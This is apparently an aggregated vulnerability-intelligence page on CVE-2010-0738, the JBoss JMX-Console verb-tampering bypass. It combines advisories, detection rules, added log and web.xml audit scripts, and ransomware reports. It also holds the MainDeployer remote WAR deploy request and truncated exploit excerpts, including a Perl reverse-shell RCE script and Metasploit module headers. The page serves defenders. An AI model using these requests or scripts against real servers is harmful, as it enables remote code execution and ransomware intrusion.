CVE-2010-0738
Published 2010-04-28
CVE-2010-0738: The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before…
Priority: P1 · 83 · medium · CVSS 3.1 base score 5.3
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Tags: KEV · ITW · EXPLOIT · Ransomware
CISA Known Exploited Vulnerability, remediation due 2022-06-15
Exploited in the wild
EPSS: 79.42% (99.6th percentile)
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | procurve_manager | — | — |
| hp | procurve_manager | — | — |
| redhat | jboss_enterprise_application_platform | <= 5.1.1 | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_brms_platform | <= 5.2.0 | — |
| redhat | jboss_enterprise_portal_platform | <= 4.3.0 | — |
| redhat | jboss_enterprise_soa_platform | <= 5.1.1 | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
Detection & IOCs (extracted from sources)
command: action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>
- CVE-2010-0738 is exploited by sending HTTP requests using a verb other than GET or POST (e.g., HEAD) to bypass JBoss JMX Console authentication; detect non-standard HTTP verbs targeting /jmx-console/HtmlAdaptor
- The exploit uses a HEAD (or other non-standard) HTTP verb against /jmx-console/HtmlAdaptor to bypass access controls; alert on HTTP methods other than GET/POST to this URI
- The servlets invoked by httpha-invoker perform access control only for GET and POST methods; monitor for non-GET/POST HTTP requests to JBoss invoker/console endpoints as an authentication bypass indicator
- CVE-2010-0738 was actively exploited by SamSam ransomware actors targeting unpatched JBoss servers; correlate JBoss exploitation attempts with subsequent ransomware staging activity
- The exploit deploys a WAR archive via jboss.system:service=MainDeployer; monitor for unexpected WAR deployments or HTTP requests containing 'MainDeployer' and 'deploy' parameters on JBoss servers
- Detect platform fingerprinting attempts against JBoss by monitoring requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
- The VERB option in the Metasploit module defaults to POST, but the CVE-2010-0738 bypass specifically requires a verb other than GET or POST (e.g., HEAD); the module logic forces HEAD when a non-GET/POST verb is configured
- The MainDeployer-based WAR upload method requires the target JBoss server to be able to make outbound connections back to the attacker's HTTP server to fetch the WAR payload
- CVE-2011-4085 is explicitly noted as a regression of CVE-2010-0738, meaning patching CVE-2010-0738 alone may not be sufficient if the regression is present in affected JBoss platform versions
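The detection points listed above (non-GET/POST verbs to the console, MainDeployer deploy calls, ServerInfo fingerprinting) combined into one log-based check, written here as an added example rather than a rule taken from any of the cited sources. It assumes Common Log Format access logs; the sample lines, the RFC 5737 addresses and the `MANAGEMENT_PREFIXES` set are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format), not real traffic.
# Addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2018:09:14:03 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1" 401 1203
192.0.2.10 - - [12/Mar/2018:09:14:05 +0000] "HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServerInfo HTTP/1.1" 200 -
192.0.2.10 - - [12/Mar/2018:09:14:09 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.system%3Aservice%3DMainDeployer&methodName=deploy&argType=java.lang.String&arg0=http%3A%2F%2F192.0.2.10%2Fa.war HTTP/1.1" 200 -
198.51.100.7 - admin [12/Mar/2018:09:20:41 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 5120
198.51.100.7 - - [12/Mar/2018:09:21:00 +0000] "GET /index.html HTTP/1.1" 200 812
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed set of JBoss management paths behind the verb-based constraint:
# the jmx-console (CVE-2010-0738) and the httpha-invoker servlets (CVE-2011-4085).
MANAGEMENT_PREFIXES = ("/jmx-console/", "/invoker/")


def classify(line):
    """Return a finding dict for one log line, or None if it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, url = m["method"], urlsplit(m["target"])
    path = unquote(url.path)
    if not path.startswith(MANAGEMENT_PREFIXES):
        return None
    # parse_qs percent-decodes, so jboss.system%3Atype%3DServerInfo is normalised.
    q = {k: v[0] for k, v in parse_qs(url.query).items()}
    name = q.get("name", "")
    findings = []
    if method not in ("GET", "POST"):
        # The web.xml constraint lists only GET and POST, so any other verb
        # reaches the servlet without authentication.
        findings.append("verb tampering: %s %s" % (method, path))
    if (q.get("action") == "invokeOpByName" and "MainDeployer" in name
            and q.get("methodName") == "deploy"):
        findings.append("remote WAR deployment via MainDeployer from %s" % q.get("arg0", "?"))
    if q.get("action") == "inspectMBean" and name == "jboss.system:type=ServerInfo":
        findings.append("platform fingerprinting via ServerInfo MBean")
    if not findings:
        return None
    status = int(m["status"])
    return {
        "src": m["src"],
        "ts": m["ts"],
        "method": method,
        "status": status,
        # A 2xx/3xx answer to a non-GET/POST request means the bypass worked;
        # a 401 on the same request is what a fixed web.xml produces.
        "bypass_succeeded": method not in ("GET", "POST") and status < 400,
        "findings": findings,
    }


def scan(log_text):
    """Run classify() over every line and keep the hits, in order."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["method"], hit["status"], "; ".join(hit["findings"]))
```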
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N |
| nvd | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | — | 5.3 | MEDIUM | — |
| cisa | — | 5.3 | MEDIUM | — |
| vendor_redhat | — | 5.3 | MEDIUM | — |
GHSA · GHSA-24wp-35x7-5hx9 · CVE-2011-4085 [MEDIUM] CWE-287 · ghsa_unreviewed · 2022-05-17 · CVSS 5.3
The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5.1.2, SOA Platform before 5.2.0, BRMS Platform before 5.3.0, and Portal Platform before 4.3 CP07 perform access control only for the GET and POST methods, which allow remote attackers to bypass authentication by sending a request with a different method. NOTE: this vulnerability exists because of a CVE-2010-0738 regression.
GHSA · GHSA-mm58-72w4-25hp · CVE-2013-4810 [HIGH] CWE-94 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.
GHSA · GHSA-72pp-v9jm-c6xj · CVE-2010-0738 [MEDIUM] CWE-749 · ghsa_unreviewed · 2022-05-02
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
VulnCheck · CVE-2011-4085 [MEDIUM] · vulncheck · 2011 · CVSS 5.3 · Red Hat JBoss Application Server Improper Authentication
The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5.1.2, SOA Platform before 5.2.0, BRMS Platform before 5.3.0, and Portal Platform before 4.3 CP07 perform access control only for the GET and POST methods, which allow remote attackers to bypass authentication by sending a request with a different method. NOTE: this vulnerability exists because of a CVE-2010-0738 regression.
Affected: Red Hat JBoss Application Server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.acn.gov.it/portale/w/distribuzione-di-payload-malevoli-tramite-vulnerabilita-note
VulnCheck · CVE-2010-0738 [MEDIUM] CWE-264 · vulncheck · 2010 · CVSS 5.3 · Red Hat JBoss Authentication Bypass Vulnerability
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Affected: Red Hat JBoss
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References:
- https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
- https://nsarchive.gwu.edu/sites/default/files/documents/5986978/National-Security-Archive-Department-of-Justice.pdf
- https://www.tenable.com/blog/samsam-ransomware-how-to-identify-and-mitigate-the-risk
- https://news.sophos.com/en-us/2018/05/02/s
CISA · CVE-2010-0738 [MEDIUM] CWE-264 · cisa · 2022-05-25 · CVSS 5.3 · Red Hat JBoss Authentication Bypass Vulnerability
Affected: Red Hat JBoss
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2010-0738
Remediation Due Date: 2022-06-15
Red Hat · CVE-2011-4085 [MEDIUM] · vendor_redhat · 2011-11-16 · CVSS 5.3 · Invoker servlets authentication bypass (HTTP verb tampering)
The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5.1.2, SOA Platform before 5.2.0, BRMS Platform before 5.3.0, and Portal Platform before 4.3 CP07 perform access control only for the GET and POST methods, which allow remote attackers to bypass authentication by sending a request with a different method. NOTE: this vulnerability exists because of a CVE-2010-0738 regression.
Red Hat · CVE-2010-0738 [MEDIUM] CWE-284 · vendor_redhat · 2010-04-26 · CVSS 5.3 · JBoss EAP jmx authentication bypass with crafted HTTP request
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Suricata · CVE-2010-0738 · suricata · 2011-12-10 · ET WEB_SERVER JBoss jmx-console Access Control Bypass Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER JBoss jmx-console Access Control Bypass Attempt"; flow:established,to_server; http.method; content:"HEAD"; http.uri; content:"/jmx-console/HtmlAdaptor?"; nocase; content:"Runtime.getRuntime().exec("; reference:cve,2010-0738; classtype:web-application-activity; sid:2014018; rev:4; metadata:created_at 2011_12_10, cve CVE_2010_0738, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Suricata · CVE-2010-0738 · suricata · 2011-12-10 · ET WEB_SERVER JBoss jmx-console Probe
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER JBoss jmx-console Probe"; flow:established,to_server; http.method; content:"HEAD"; http.uri; content:"/jmx-console/HtmlAdaptor?"; nocase; reference:cve,2010-0738; classtype:web-application-activity; sid:2014017; rev:4; metadata:created_at 2011_12_10, cve CVE_2010_0738, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Suricata · CVE-2010-0738 · suricata · 2010-07-30 · ET WEB_SPECIFIC_APPS JBoss JMX Console Beanshell Deployer .WAR File Upload and Deployment Cross Site Request Forgery Attempt
Rule: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS JBoss JMX Console Beanshell Deployer .WAR File Upload and Deployment Cross Site Request Forgery Attempt"; flow:established,to_client; content:"/HtmlAdaptor"; nocase; content:"action=invokeOpByName"; nocase; within:25; content:"DeploymentFileRepository"; nocase; within:80; content:"methodName="; nocase; within:25; content:".war"; nocase; distance:0; content:".jsp"; nocase; distance:0; reference:url,www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now; reference:cve,2010-0738; classtype:web-application-attack; sid:2011
Suricata · CVE-2010-0738 · suricata · 2010-07-30 · ET WEB_SPECIFIC_APPS Possible JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Exploit Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Exploit Attempt"; flow:established,to_server; http.uri; content:"/HtmlAdaptor"; nocase; content:"action=inspect"; nocase; content:"bean"; nocase; content:"name="; reference:url,www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now; reference:cve,2010-0738; classtype:web-application-attack; sid:2011696; rev:6; metadata:created_at 2010_07_30, cve CVE_2010_0738, confidence Medium, signature_severity Major, updated_at 2020_09_11;)
Exploit-DB · CVE-2014-7883 [MEDIUM] · exploitdb · 2015-02-03 · CVSS 5.0 · Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass
---
Mogwai Security Advisory MSA-2015-02
Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
CVE-ID: CVE-2014-7883
Product: Hewlett-Packard Universal CMDB (UCMDB)
Affected versions: UCMDB 10.10 (Other versions might also be affected)
Impact: high
Remote: yes
Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html
Reported: 14/11/2014
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
The HP Universal CMDB (UCMDB) automatically collects and manages accurate and
current business service definitions, associated infrastructure relationships and
detailed information on the assets, and is a central component in man
Exploit-DB · CVE-2010-0738 [MEDIUM] · exploitdb · 2011-10-03 · CVSS 5.3 · JBoss & JMX Console - Misconfigured Deployment Scanner
---
```perl
#!/usr/bin/perl
# Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner
# Date: Oct 3 2011
# Author: y0ug codsec.com
# Version:
# Tested on: Linux
# CVE : CVE-2010-0738
#
# POC against misconfigured JBoss JMX Console
# It use the addUrl method in DeploymentScanner module
#
# More information
# http://packetstormsecurity.org/files/download/105479/JBossWhitepaper.pdf
# http://poc-hack.blogspot.com/2011/02/how-to-hack-any-version-of-jboss.html
#
# You need to edit
# $url_cmd to match the war payload url
# $url_shell is your reverse shell url
# ( only if you want to use reverse_shell("ip", "port") )
#
# The JSP shell is not mine is available every where
# I add a -b param that build the war contener to do this you need j
```
Exploit-DB · CVE-2010-0738 · exploitdb · 2011-03-04 · JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution
---
```perl
JBoss Application Server 4.2 \n";
print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n";
exit;
}
if ($#ARGV != 4) { usage; }
$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$com = $ARGV[4];
if ($com eq "lnx") {
$comspec = "/bin/sh";
}
if ($com eq "win") {
$comspec = "cmd.exe";
}
$|=1;
$jsp="
0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
";
#print $jsp;exit;
srand(time());
sub randstr
{
my $length_of_randomstring=shift;# the length of
# the random string to generate
my @chars=('a'..'z','A'..'Z','0'..'9','_');
my $random_string;
foreach (1..$length_of_randomstring)
{
# rand @chars will generate a random
# num
```
Exploit-DB · CVE-2010-0738 · exploitdb · 2011-01-10 · JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)
---
```ruby
##
# $Id: jboss_bshdeployer.rb 11533 2011-01-10 14:34:24Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Beanshell Deployer WAR upload and deployment',
'Description' => %q{
This module can be used to install a WAR file payload on JBoss servers that have
an exposed "jmx-console" application. The payload is put o
```
Exploit-DB · CVE-2007-1036 · exploitdb · 2010-10-19 · JBoss JMX - Console Deployer Upload and Execute (Metasploit)
---
```ruby
##
# $Id: jboss_maindeployer.rb 10754 2010-10-19 22:24:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Deployer Upload and Execute',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have
an exposed "jmx-console" applicat
```
Exploit-DB · CVE-2010-0738 · exploitdb · 2010-08-03 · JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)
---
```ruby
##
# $Id: jboss_deploymentfilerepository.rb 9950 2010-08-03 15:14:34Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository WAR deployment',
'Description' => %q{
This module uses the DeploymentFileRepository class in
JBoss Application Server (jbossas) to deploy a JSP file
in a minimal WAR context.
},
```
Metasploit · SAP URL Scanner
This module scans for commonly found SAP Internet Communication Manager URLs and outputs return codes for the user.
Metasploit · JBoss Vulnerability Scanner
This module scans a JBoss instance for a few vulnerabilities.
Metasploit · JBoss Java Class DeploymentFileRepository WAR Deployment
This module uses the DeploymentFileRepository class in JBoss Application Server (jbossas) to deploy a JSP file which then deploys the WAR file.
Metasploit · JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment
This module uses the DeploymentFileRepository class in the JBoss Application Server to deploy a JSP file which then deploys an arbitrary WAR file.
Metasploit · JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
This module can be used to install a WAR file payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method.
Metasploit · JBoss JMX Console Deployer Upload and Execute
This module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.
arXiv · arxiv_fulltext · 2025-02-12 · Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel and Sergio Maffeis, Department of Computing, Imperial College London, London, United Kingdom
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
Bugzilla · CVE-2011-4085 [MEDIUM] · bugzilla · 2011-11-01 · CVSS 5.3 · CVE-2011-4085 Invoker servlets authentication bypass (HTTP verb tampering)
By using a specially crafted HTTP request, the first layer of authentication for the invoker servlets deployed by httpha-invoker can be bypassed, as the access restrictions only apply for GET and POST. Due to the second layer of authentication provided by the security interceptor, there is no way to directly exploit this flaw. If a user misconfigured the security interceptor or inadvertently disabled it, this flaw would be exploitable.
The fix is to remove the verb-specific elements from web.xml. This issue is a regression of CVE-2010-0738.
Discussion:
This issue has been addressed in following products:
JBoss Enterprise SOA Platform 5.2.0
Via RHSA-2011:1456 https://rhn.redhat.com/errata/RHSA-2011-1456.html
Bugzilla · CVE-2010-0738 [MEDIUM] · bugzilla · 2010-03-16 · CVSS 5.3 · CVE-2010-0738 JBoss EAP jmx authentication bypass with crafted HTTP request
By using a specially crafted HTTP request, the authentication of the jmx-console can be bypassed, as the access restrictions only apply for GET and POST.
Current setting is:
```xml
<security-constraint>
  <web-resource-collection>
    <web-resource-name>HtmlAdaptor</web-resource-name>
    <description>An example security config that only allows users with the
      role JBossAdmin to access the HTML JMX console web application</description>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>JBossAdmin</role-name>
  </auth-constraint>
</security-constraint>
```
and should be changed to block ALL http-methods.
Acknowledgements:
Red Hat would like to thank Stefano Di Paola and Giorgio Fedon of Minded Security for responsibly reporting this issue.
Discussion:
This issue has been addressed in following products:
JBEAP 4.2.0 for RHEL 4
Via RHSA-2010:0376 https://rhn.redhat.com/errata/RHSA-2010-0376.html
---
This issue has been addre
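The web.xml weakness the Red Hat bug describes, as an added audit example (not Red Hat's or JBoss's code): it flags any security-constraint whose web-resource-collection enumerates http-method elements, and shows the fixed form with those elements removed so the constraint covers every verb. The embedded descriptor is constructed from the values quoted in the bug; the j2ee namespace and the function names are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed web.xml fragment modelled on the jmx-console descriptor quoted in
# the Red Hat bug: the constraint names GET and POST only, so every other verb
# reaches the HtmlAdaptor servlet without passing the JBossAdmin check.
WEAK_WEB_XML = """\
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <description>An example security config that only allows users with the
        role JBossAdmin to access the HTML JMX console web application</description>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>JBossAdmin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

# The fix Red Hat describes: drop the verb-specific elements so the constraint
# applies to ALL HTTP methods.
FIXED_WEB_XML = (WEAK_WEB_XML
                 .replace("      <http-method>GET</http-method>\n", "")
                 .replace("      <http-method>POST</http-method>\n", ""))


def _local(tag):
    # Strip the namespace so the audit works whether web.xml declares j2ee,
    # javaee or no namespace at all.
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _text(elem):
    return (elem.text or "").strip()


def audit_security_constraints(web_xml):
    """Return one finding per web-resource-collection whose auth-constraint is
    limited to an explicit list of HTTP methods (the CVE-2010-0738 pattern)."""
    findings = []
    for sc in ET.fromstring(web_xml).iter():
        if _local(sc.tag) != "security-constraint":
            continue
        roles = [_text(r) for ac in _children(sc, "auth-constraint")
                 for r in _children(ac, "role-name")]
        for wrc in _children(sc, "web-resource-collection"):
            methods = [_text(m) for m in _children(wrc, "http-method")]
            if not methods:
                continue  # no verb list: the constraint covers every method
            names = _children(wrc, "web-resource-name")
            findings.append({
                "resource": _text(names[0]) if names else "",
                "url_patterns": [_text(p) for p in _children(wrc, "url-pattern")],
                "protected_methods": methods,
                "roles": roles,
                "issue": "only %s require role(s) %s; any other verb (HEAD, PUT, "
                         "DELETE, ...) bypasses the constraint"
                         % ("/".join(methods), ", ".join(roles) or "<none>"),
            })
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_WEB_XML), ("fixed", FIXED_WEB_XML)):
        print(label, audit_security_constraints(doc) or "no verb-limited constraints")
```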
Fortinet · [MEDIUM] · blogs_fortinet · 2019-05-20 · CVSS 5.3 · A Closer Look at Satan Ransomware's Propagation Techniques
FortiGuard Labs Threat Research · By David Maciejak and Floser Bacurio Jr. | May 20, 2019
Satan ransomware first appeared in early 2017, and since then threat actors have been constantly improving the malware to infect its victims more effectively and to maximize its profits. For instance, FortiGuard Labs has discovered a campaign which was also utilizing a cryptominer malware as an additional payload to maximize its profits from its victims.
Aside from the fact that this file-encrypting malware targets both Linux and Windows platform, it also employs numerous vulnerabilities to propagate itself through public and external networks. In fact, FortiGuard Labs has discovered a new variant t
Tenable · blogs_tenable · 2018-03-28 · SamSam Ransomware: How to Identify and Mitigate the Risk
Tenable Research · March 28, 2018
SamSam ransomware, which hit the city of Atlanta's systems in late March 2018, continues to be a threat. The most recent iteration leverages brute force remote desktop protocol (RDP) as an attack vector.
#### Updated on August 22, 2018
The latest iteration of SamSam attacks primarily leverages brute force RDP via tools like NLBrute while it previously leveraged JBoss/deserialization vulnerabilities. Plugin 66173 will detect exposure of remote RDP targets (rdp_logon_screen.nbin)
Remote RDP widens your attack surface and can be an easy way for attackers to get into your network. If you must use remote RDP, Two-Factor Authentication (2FA) along w
References
- http://marc.info/?l=bugtraq&m=132129312609324&w=2
- http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=35
- http://secunia.com/advisories/39563
- http://securityreason.com/securityalert/8408
- http://securitytracker.com/id?1023918
- http://www.securityfocus.com/bid/39710
- http://www.vupen.com/english/advisories/2010/0992
- https://bugzilla.redhat.com/show_bug.cgi?id=574105
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58147
- https://rhn.redhat.com/errata/RHSA-2010-0376.html
- https://rhn.redhat.com/errata/RHSA-2010-0377.html
- https://rhn.redhat.com/errata/RHSA-2010-0378.html
- https://rhn.redhat.com/errata/RHSA-2010-0379.html
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-0738
Timeline: published 2010-04-28 · added to CISA KEV 2022-05-25 · exploited in the wild